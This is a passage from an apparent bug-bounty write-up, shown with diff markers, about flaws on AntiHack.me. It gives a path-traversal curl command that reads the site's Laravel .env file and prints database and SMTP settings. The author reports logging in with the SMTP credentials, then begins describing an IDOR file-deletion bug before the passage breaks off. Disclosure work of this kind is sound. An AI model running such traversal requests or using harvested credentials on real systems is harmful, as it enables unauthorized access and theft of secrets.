 It can be seen that the file

 filedownload.php really has a vulnerability so we can download files on the server.
-Because the AntiHack.me website uses Laravel, then I try to get the config file, which is in the
+Because of the AntiHack.me website uses Laravel, and then I try to get the config file, which is in the

 [[email protected] ~]# curl https://www.antihack.me/filedownload.php?file=../../../../var/www/html/.env DB_CONNECTION=mysql DB_HOST=localhost DB_PORT=3306 DB_DATABASE=antihack DB_USERNAME=antihack DB_PASSWORD= MAIL_DRIVER=smtp MAIL_HOST=smtp.zoho.com MAIL_PORT=465 [email protected] MAIL_PASSWORD=[ redacted ]

 From this information, I obtain sensitive information such as user and database passwords.
 There is even an SMTP user and password used.
 I tried logging in using the SMTP user and password obtained, and it’s worked XD.

 VULNERABILITY II (IDOR Delete Any File on AntiHack.me Server)

 As on other Bug Bounty websites, there is a feature for reporting vulnerability found.
 There is also an attached file feature to add images or video files to complete the report that we send.
 After finishing uploading the file on the report form, an X button appears, which serves to delete the file that was just uploaded.
 Of course, the function is to delete the file if we incorrectly upload the report file.

 When the button is clicked, the process runs like this: